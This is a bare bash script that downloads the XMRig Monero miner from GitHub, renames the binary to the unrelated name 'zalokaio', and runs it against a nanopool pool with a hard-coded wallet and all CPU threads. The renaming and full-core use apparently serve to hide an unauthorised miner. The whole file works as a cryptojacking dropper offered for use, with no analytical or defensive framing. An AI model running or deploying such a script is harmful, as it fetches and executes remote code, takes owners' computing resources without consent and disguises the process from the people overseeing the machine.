#!/bin/bash
wget https://github.com/xmrig/xmrig/releases/download/v6.26.0/xmrig-6.26.0-linux-static-x64.tar.gz
tar xf xmrig-6.26.0-linux-static-x64.tar.gz
cd xmrig-6.26.0
mv xmrig zalokaio
./zalokaio --donate-level 1 -o xmr-eu1.nanopool.org:10300 -u 84bEkQaAvXnPXXghsfBYBeLGtkAV8eP1HX7rP7EUBE1pHvtwAffjCE2SzzY8y79fkgHA21czuEWoVUDkAf7e4qM5KMKCKVK -p $(echo $RANDOM | md5sum | head -c 10) -a rx/0 -k -t $(nproc --all)
